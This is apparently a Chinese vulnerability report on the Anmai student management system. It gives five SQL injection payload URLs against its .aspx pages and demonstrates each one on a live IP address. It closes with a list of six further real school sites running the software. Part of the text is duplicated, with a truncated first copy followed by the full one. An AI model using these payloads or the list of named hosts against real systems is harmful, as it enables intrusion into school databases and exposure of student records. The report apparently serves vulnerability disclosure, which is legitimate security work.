### 简要描述: 安脉学生综合管理系统5处SQL注入漏洞 ### 详细说明: 5处利用payload分别如下 ``` /OA/document/DocCheckView.aspx?id=1 and @@version=1 /OA/news/viewAffiche.aspx?id=1 and @@version=1 /Asset/Device/Admin_Photo.aspx?Action=Modify&HouseID=1' and @@version=1-- /Asset/Device/DeviceCancelInfo_View.aspx?DeviceCancelID=1' and @@version=1-- /Asset/Device/DeviceInputSearch.aspx?hidsearch=search&assetfactory=1' and @@version=1-- ``` ### 漏洞证明: 以 http://218.22.96.74:8899/ 为例 http://218.22.96.74:8899/OA/document/DocCheckView.aspx?id=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/10124245fb54497ec7d26eee03a991ed89282036.jpg" alt="QQ截图20150410124534.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10124245fb54497ec7d26eee03a991ed89282036.jpg) http://218.22.96.74:8899/OA/news/viewAffiche.aspx?id=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/101243042300dd0d44cd26c0ca0fbbdeccf35ebd.jpg" alt="QQ截图20150410124644.jpg" width="600"...
### 简要描述: 安脉学生综合管理系统5处SQL注入漏洞 ### 详细说明: 5处利用payload分别如下 ``` /OA/document/DocCheckView.aspx?id=1 and @@version=1 /OA/news/viewAffiche.aspx?id=1 and @@version=1 /Asset/Device/Admin_Photo.aspx?Action=Modify&HouseID=1' and @@version=1-- /Asset/Device/DeviceCancelInfo_View.aspx?DeviceCancelID=1' and @@version=1-- /Asset/Device/DeviceInputSearch.aspx?hidsearch=search&assetfactory=1' and @@version=1-- ``` ### 漏洞证明: 以 http://218.22.96.74:8899/ 为例 http://218.22.96.74:8899/OA/document/DocCheckView.aspx?id=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/10124245fb54497ec7d26eee03a991ed89282036.jpg" alt="QQ截图20150410124534.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10124245fb54497ec7d26eee03a991ed89282036.jpg) http://218.22.96.74:8899/OA/news/viewAffiche.aspx?id=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/101243042300dd0d44cd26c0ca0fbbdeccf35ebd.jpg" alt="QQ截图20150410124644.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/101243042300dd0d44cd26c0ca0fbbdeccf35ebd.jpg) http://218.22.96.74:8899/Asset/Device/Admin_Photo.aspx?Action=Modify&HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10124514ca0d4307b4640d6c1305ee84eb33320e.jpg" alt="QQ截图20150410124658.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10124514ca0d4307b4640d6c1305ee84eb33320e.jpg) http://218.22.96.74:8899/Asset/Device/DeviceCancelInfo_View.aspx?DeviceCancelID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/101245280464421af3addefc4f7a18cba979edb6.jpg" alt="QQ截图20150410124714.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/101245280464421af3addefc4f7a18cba979edb6.jpg) http://218.22.96.74:8899/Asset/Device/DeviceInputSearch.aspx?hidsearch=search&assetfactory=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10124546a391c751b9c6c58c5bba6c431c3c975e.jpg" alt="QQ截图20150410124730.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10124546a391c751b9c6c58c5bba6c431c3c975e.jpg) 再提供一些案例 http://www.qs2fz.com:8080/ http://218.4.66.18/ http://bssyxxgl.eicbs.com/anmai/ http://www.gxbyzx.cn:88/ANMAI/ http://jmzx.xmedu.cn:9999/ANMAI/ http://119.52.145.27/anmai/